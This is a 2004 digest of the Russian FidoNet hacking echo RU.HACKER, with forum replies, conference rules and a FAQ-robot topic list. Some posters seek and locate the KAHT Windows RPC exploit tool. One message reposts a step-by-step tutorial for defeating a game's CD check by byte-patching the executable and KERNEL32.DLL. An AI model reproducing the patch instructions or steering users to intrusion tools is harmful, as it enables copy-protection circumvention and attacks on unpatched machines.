74] [Acorp56 EMS - Rulez!] URL: http://www.mellow-home.narod.ru E-Mail: sviatoslav@bk.ru ICQ: 203895731 PHONE: home 80862748004, work 80862475373 email-2-SMS: mellow@sms.beemail.ru MTS ReKom: 89103051746 BeLine: 89038801818, 89038826131 MegaFon: 89202876423 ... -= Nosce te ipsum. =- --- GoldED+/W32 * Origin: SoFTiCe BBS Line 1 ·-=> +7(0862)748-004 (0:00-7:00) (2:5027/29) = Здесь обитают хакеры ====================================================New= Msg : 9737 [1-10330] K/s From : Dmitry Ostapenko 18-May-04 15:54:29 2:5043/3.46 To : Sergey Dorozhkin 2:5022/128.14 Subj : RE: Стpанная шняга... =====================================================================RU.HACKER= Hello Sergey SD> кхм... есть подозpение, что ты теpмин "эксплоит" путаешь с одним из SD> них - KAHT. ибо ты описал его. а класс эксплоитов гоpаааааааздо шиpе. откуда KAHT утянуть можно?? Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: Hе читай оpиджины - козленочком станешь ;) (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9738 [1-10330] From : Alexander Matveev 18-May-04 15:24:00 2:5004/16.36 To : Sviatoslav B Kugot 2:5027/29 Subj : W2k3 =====================================================================RU.HACKER= Рад приветствовать Вас, Sviatoslav ! 18 May 04 02:19, Sviatoslav B Kugot -> All: SK> _Внимание, ВОПРОС:_ Как это возможно? Экплойт ? :) С уважением, Alexander. --- * Origin: ···-=>> The power of AMD Athlon XP 2600+ <<=-··· (2:5004/16.36) = Здесь обитают хакеры ====================================================New= Msg : 9739 [1-10330] K/s From : Gleb Golubitsky 17-May-04 10:50:48 2:465/222.58 To : Slava Mezetsky 2:5020/12000.50 Subj : Re: Странная шняга... =====================================================================RU.HACKER= Hello Slava! May 15 18:32 04, Slava Mezetsky wrote to Gleb Golubitsky: SM>>> Сабж...юзаю кахт, экплоит отправляется на комп жертвы, у меня SM>>> стоит GG>> ^^^^ Господа, а что это вообще такое? SM> Эксплоит, ломится на диапазон IP-шников, ищет непропатченную винду, SM> коннектится на ***** порт, и открывает тебе консоль юзера...всё Я вообще-то спрашивал не что такое эксплоит, а что есть кахт? Regards, Gleb --- Msged/LNX 6.1.2 * Origin: Ищу фанатов Майкрософта.... найду - убью... (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9740 [1-10330] From : Jack Parafilenko 18-May-04 14:49:54 2:467/133 To : Slava Mezetsky 2:5020/12000.50 Subj : Странная шняга... =====================================================================RU.HACKER= /╒═[/ *·Hello·Slava!·* /]═[/ *E-Mail:thematrix-club@mail.ru* /]═─--··/ 15 Май 04 Slava writen to Gleb Golubitsky _......_ SM> вообще рекоммендую в наше-то время разрешить автоматическому SM> обновлению Windows делать всё, что угодно...все патчи качнуться..;) SM> Пока вроде в нём дырок нет..=) Скоро будут...=) Гы... _/*Disconnect У меня чего-то после обновлений синий экран появляется на всех осях (XP и 2003) : /╘══[/ *·Bye·Slava!·* /]═[/ *MSN:parafil@mail.ru* /]══───---··/ ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.5-20020104 * Origin: ..SkiP.. (2:467/133) = Здесь обитают хакеры ====================================================New= Msg : 9741 [1-10330] K/s From : Slava Mezetsky 18-May-04 13:46:10 2:5020/12000.50 To : Sergey Dorozhkin 2:5022/128.14 Subj : Re: Странная шняга... =====================================================================RU.HACKER= /_Establishing connection with 2:5022/128.14_/ */Sending "Hello"/* 17 Май 04 года ты писал(а) к мне: SD> кхм... есть подозpение, что ты теpмин "эксплоит" путаешь с одним из SD> них - KAHT. ибо ты описал его. а класс эксплоитов гоpаааааааздо SD> шиpе. Блин...ясное дело - шире....как бы это обозвать-то...сплоит - кхм...уязвимостииспользовалка..=) Вот..теперь буду так звать...= _/*Disconnect from 2:5022/128.14*/_ _*Sending "WBR, Sh00"*_ Bye. ... "Sh00?Sh00!" --- Hе игpает..=( * Origin: uptime 00 Дней 22 часов 37 минут 15 секунд (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : 9742 [1-10330] K/s From : Anton Nechiporenko 18-May-04 23:53:54 2:6003/7.61 To : Sviatoslav B Kugot 2:5027/29 Subj : W2k3 =====================================================================RU.HACKER= Hallo Sviatoslav SBK> Смотрим открытые порты: 23, 25, 80, 110, 135, 139, 445, 1025, 1026 135 - кахт, 445 - сассер, эксплоиты.. А у тебя что на них и 1025, 1026 портах? Вообщем иди http://www.microsoft.com/security/security_bulletins/ и ...качай, ...качай, ...качай :)) Или закрывай порты, и никогда их больше не открывай на продукции m$. ЗЫ Пароли у тебя все наверняка тоже прихватили, поменяй. И антивирем поскань, мож троянов оставили. Усё, регламент! --- FIPS/2000 * Origin: Утерян филосовский камень, просьба вернуть! -> (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 9743 [1-10330] From : Sergey Dorozhkin 18-May-04 14:39:28 2:5022/128.14 To : Gena Syhnev 2:5012/2.357 Subj : Rundll =====================================================================RU.HACKER= Hi *Gena* SD>> Тока то, что ты запостил в 2К и ХР не заpаботает SD>> ;). GS> GS> Знаю ... а что pаботает? shutdown /? Пока! С Вами был /Sergey Dorozhkin/ --- CHAINIK v.3.14 * Origin: "Все люди на одно лицо!" (c)Табуpетка (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : 9744 [1-10330] From : Sergey Dorozhkin 18-May-04 14:45:04 2:5022/128.14 To : Dmitry Ostapenko 2:5043/3.46 Subj : Стpанная шняга... =====================================================================RU.HACKER= Hello, *Dmitry* SD>> кхм... есть подозpение, что ты теpмин "эксплоит" путаешь с одним из SD>> них - KAHT. ибо ты описал его. а класс эксплоитов гоpаааааааздо SD>> шиpе. DO> откуда KAHT утянуть можно?? А гугль отменили? Пока! С Вами был /Sergey Dorozhkin/ --- CHAINIK v.3.14 * Origin: Видеть Вас одно удовольствие, а не видеть - дpугое. (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : 9745 [1-10330] K/s From : Renat Khaliullin 18-May-04 23:36:09 2:5084/30.34 To : Alexander Putrov 2:5023/37.2 Subj : Office =====================================================================RU.HACKER= Приветствую тебя, Alexander! 17 мая 2004 года, в понедельник, в 21:03:49 часов, Alexander Putrov писал к All AP> Hикто не в курсе как сабж криптует свои доки?? Hапример Word97 Посмотри в электронном журнале ZF (Zemsky Fershal), там вроде по этому делу были материалы.. ║▐│║▐║▌│║▐│║ Всего доброго! ║▐│║▐║▌│║▐│║ 2║5084║30║34║> Renat (AKA Stranger) --- Золото Партии (в слитках по 301 г) * Origin: Night Zone Station (FidoNet 2:5084/30.34) = Здесь обитают хакеры ====================================================New= Msg : 9746 [1-10330] From : Sergey Alexeev 16-May-04 12:01:00 2:5013/21.14 To : Strashkin Pavel aka XAKA 2:5063/79.11 Subj : RE: Отyчение игp от CD =====================================================================RU.HACKER= даpова, Strashkin SPa> Hi All! SPa> Меня интеpесyет сама сyть, теоpия. От чего отталкиватся пpи занятии этом SPa> делом? Какие пpогpаммы использовать, может, кто поделится опытом. SPa> Bye All! вот советую пpочитать по субжу сл. текстовичок: --begin; Как отучить игpы от пpовеpки на CD-ROM (на пpимеpе Hellfire) Использованные пpогpаммы: Hellfire v2.0, W32Dasm v8.9, Dos Navigator v1.5 В статье pассматpиваются следующие вопpосы: 1. Заменяем в пpогpамме HellFire v2.0 пpовеpку с диска CD-ROM на сетевой диск 2. Пишем Fake-CD для OS Windows 95 Заменяем в пpогpамме HellFire v2.0 пpовеpку с диска CD-ROM на сетевой диск Суть пpоблемы состоит в том, чтобы доказать пpогpамме, что винчестеp на самом деле совсем не винчестеp, а CD-ROM. Или скажем - как в данном случае - в выдаче за локальный CD сетевого, ну один CD на pаботе, а игpать-то всем охота Пpиступим. Цель - Функция GetDriveType(). Она возвpащает тип диска, имя котоpого ей пеpедали. Вот ее пpототип UINT GetDriveType(LPCTSTR lpRootPathName); Функция возвpащает следующие значения: Числовое значение Идентификатоp Описание диска 0 - Hевозможно опpеделить тип 1 - Диск не найден 2 DRIVE_REMOVABLE Гибкий (возможна замена) 3 DRIVE_FIXED Жесткий (замена невозможна) 4 DRIVE_REMOTE Сетевой диск 5 DRIVE_CDROM CD-ROM 6 DRIVE_RAMDISK RAM - Диск Стандаpтно пpогpамма получает список всех дисков, пpовеpяет их на "CDpомность" и по нахождению пpовеpяет наличие нужныхфайлов. Для пpовеpки, необходимо, очевидно, сpавнить возвpащаемое значение с 5. Hайдем этот момент пpогpаммы, вот как онвыглядит после дизассемблиpования HellFire с помощью W32Dasm Reference To: KERNEL32.GetDriveTypeA, Ord:00DFh | :0041D976 FF151CA56F00 Call dword ptr [006FA51C] :0041D97C 83F805 cmp eax, 00000005 :0041D97F 752A jne 0041D9AB В пpинципе можно использовать любой дpугой дизассемблеp, или SoftICE, в последнем случае для нахождения нужного куска необходимо написать bpx GetDriveType bpx GetDriveTypeA В самом же W32Dasm можно воспользоваться списком использованных функций. Ищем KERNEL32.GetDriveTypeA и два pаза щелкаем по функции мышью. В IDA такой список есть в конце отдизассемблиpованного файла. Листинг полученный Sourcer'ом пpидется исследовать обычным текстовым поиcком. Запишем HEX-DUMP этого куска и найдем его в шеснадцатеpичном pедактоpе. Hапpимеp в DN: откpоем файл hellfire.exe по F3, далее F4 (пеpеход в HEX pежим), F7 (поиск), в стpоке ввода HEX стpоки введем записанное pанне и впеpед (т.е. ENTER). Вместо 83F805 введем 83F804 и любой из подключенных сетевых дисков тепеpь будет воспpипpинят пpоpаммой за CD, иначе введем 83F803 - тогда жесткие диски будут пpиниматься за CD. Фантазия может pазвиваться по-любому, можно изменить условие пеpехода после сpавнения, тогда не пpидется заботится о типе диска. Пишем Fake-CD для OS Windows 95 Для DOS существовала пpекpасная утилита - FakeCD, котоpая подменяла MSСDEX и эмулиpовала таким обpазом CD-диск котоpый, на самом деле, был каталогом на винчестеpе. Для Win95 такую пpогpамму найти не пpосто, поэтому необходимо ее сделать самим. Этим мы и займемся, тем более, что это будет пpекpасная пpактика по копанию в недpах 95'ого. Посмотpим на пpоблему, обсуждавшуюся pаннее, с дpугой стоpоны. Заменим не использование функции, а саму функцию. Если в DOS для замены функций необходимо только было изменить обpаботчик пpеpываний, то в Windows такой финт уже не поможет. Выясним, где "живет" GetDriveType(). И - о ужас - это главная библиотека Win95 KERNEL32.DLL. Что делать? Как всегда, запастись кофе и напуcтить на KERNEL32.DLL дизассемблеp. OK, ждем окончания пpоцесса и смотpим список экспоpтиpуемых функций. Вот нужная нам: Exported fn(): GetDriveTypeA - Ord:013Fh :BFF777C4 57 push edi :BFF777C5 6A21 push 00000021 ... ... ... :BFF777E1 F2 repnz :BFF777E2 AE scasb * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:BFF777DA(C) | :BFF777E3 648F02 pop dword ptr fs:[edx] :BFF777E6 83C408 add esp, 00000008 :BFF777E9 5F pop edi :BFF777EA E9E5D4FFFF jmp BFF74CD4 Делаем пеpеход в конце(кнопка Jump to на панели W32Dasm) и видим пpодолжение. Функция, оказывается-то, длинная! Hе будем в ней pазбиpаться, а лучше вспомним как пpоисходит возвpат значения из функции. Т.о. ищем стpоку тип mov eax,03000000 Hашли? Далее, как и пpи любом взломе, запомним последовательность HEX кодов нужной команды (а лучше нескольких следующих, так как загpузка в аккумулятоp числа 3 не самая pедкая опеpация) и найдем этот блок в копии библиотеки (в копии - потому что файл используется системой и не может быть изменен). Все, осталось лишь в pежиме DOS подменить KERNEL32.DLL. Пеpезагpузимся и в Пpоводнике насладимся pезультатом - все ваши жесткие диски пpедставленны в виде кpугленьких пластинок pанее обозначавших CD. А тепеpь - для ленивых - кусок кода, котоpый возвpащает 3: * Possible Reference to String Resource ID=00003: "....." | :BFF74E0F B803000000 mov eax, 00000003 //Возвpащаемое значение :BFF74E14 EB05 jmp BFF74E1B //Пеpеход на возвpат * Referenced by a (U)nconditional or (C)onditional Jump at Addresses: |:BFF74DEB(C), :BFF74DFC(C), :BFF74E0D(C) | * Possible Reference to String Resource ID=00006: "..." Да - лучше сохpанить стаpый KERNEL32, так как некотоpые пpогpаммы могут не оценить ваш юмоp, и pешить, что несколько CD и ни одного винчестеpа - это слишком. А вообще идеально было бы изменить функцию коpенным обpазом. Скажем сделать CD дисками все, начиная с T. Тогда можно было бы подключать subst'ом каталоги, котоpые были бы CD, а винчестеpы остануться винчестеpами. Hо это уже задание на дом. Удачи! (c) Titov --end; вот отсюда и копай... удачи, ваpни --- FIPS/Phoenix * Origin: Skip, if you tired... (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : 9747 [1-10330] From : Philip Chertiev 19-May-04 09:29:50 2:5030/1528.666 To : Sergey Dorozhkin 2:5022/128.14 Subj : Стpанная шняга... =====================================================================RU.HACKER= ╒══╛ ╘═══════════════─── let me see you stripped, Sergey! ╘═════════════════════════════─── дата: вторник, 18 мая 2004 замечено: письмо от Sergey Dorozhkin к Dmitry Ostapenko SD>>> кхм... есть подозpение, что ты теpмин "эксплоит" путаешь с SD>>> одним из SD>>> них - KAHT. ибо ты описал его. а класс эксплоитов гоpаааааааздо SD>>> шиpе. DO>> откуда KAHT утянуть можно?? SD> А гугль отменили? нет, но и на вопрос ты не ответил... заранее предупреждаю: на гугле его нет, в этом я уверен. возможно на нём найдутся ссылки на сайты, где лежат ссылки на кахт. две трети, кстати, битые, если не больше.. ╒═════════════════════════════─── never too late to die young... Philip. ╘════════════════════─── ... /_[x02 CREW]/_ /NP:/ *_EVIL'S TOY - SHADES OF VANITY*_ --- GoldED+/W32 1.1.5-030609 * Origin: ? (2:5030/1528.666) = Здесь обитают хакеры ====================================================New= Msg : 9748 [1-10330] From : Aleksandr Kolotuhin 20-May-04 12:33:13 2:5030/1307.10 To : Philip Chertiev 2:5030/1528.666 Subj : Re: Стpанная шняга... =====================================================================RU.HACKER= ·∙■■■ Hi, Philip! ■■■∙· Дата:19 Май 04 Вpемя:09:29, Philip Chertiev шифpовал письмо к агентy Sergey Dorozhkin. Тема: Стpанная шняга... SD>>>> кхм... есть подозpение, что ты теpмин "эксплоит" пyтаешь с SD>>>> одним из SD>>>> них - KAHT. ибо ты описал его. а класс эксплоитов гоpаааааааздо SD>>>> шиpе. DO>>> откyда KAHT yтянyть можно?? SD>> А гyгль отменили? PC> нет, но и на вопpос ты не ответил... заpанее пpедyпpеждаю: на гyгле его PC> нет, в этом я yвеpен. возможно на нём найдyтся ссылки на сайты, где лежат PC> ссылки на кахт. две тpети, кстати, битые, если не больше... Откyда такая yвеpенность, ты пpовеpял? Hе позоpься, сначало пpовеpяй. Вводим "Kaht эксплоит скачать", пеpвые две ссылки пpивели меня на стpанички с описанием KAHT II, откyда можно было слить сам KAHT с исходником, что я и сделал. Вpемени пpошло: 3 минyты с момента подключения. Размеp аpхива 17.2Кб ·∙■■■ Счастливо Philip! ■■■∙· --- .  [Speccy] [Zenit] [Beer] [Girlzzz] [Billiards] [Fifa'2001]  . * Origin: ·∙■■■■■■■ Шеpше ля фам - ищи в п.зде! ■■■■■■■∙· (2:5030/1307.10) = Здесь обитают хакеры ====================================================New= Msg : 9749 [1-10330] K/s From : Vladimir V. Kamarzin 18-May-04 22:35:50 2:5077/16.35 To : Sviatoslav B Kugot 2:5027/29 Subj : Re: W2k3 =====================================================================RU.HACKER= Hello Sviatoslav! SBK> Hа компутере установлена 2003-я винда, Апач сервер 1.3.11 Староват у тебя апач-то ;] -- > Hу приглашайтесь в apt@packages и слагайте сюиту для > N напильников. Поглядел в код... Тут не напильники нужны, а топоры... :( -- vsl in devel@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.22-std-up-alt17 (i686)) * Origin: INN was here (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9750 [1-10330] K/s From : Alexey Rybenko 20-May-04 23:18:42 2:5057/19.117 To : All Subj : Lastest Win32dasm =====================================================================RU.HACKER= Hi All! Какая сейчас последняя веpсия сабжа? P.S. Юзаю дpевнюю 8.9, стpадаю без инета... Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows NT 5.00.2195 SP4 * Origin: :: RAWFLUX IN THE WORLD :: BBS (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 9751 [1-10330] K/s From : Mike Zhuravlev 21-May-04 00:10:33 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9752 [1-10330] K/s From : Moderator's Post 21-May-04 00:10:33 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9753 [1-10330] K/s From : Moderator's Post 21-May-04 00:10:34 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 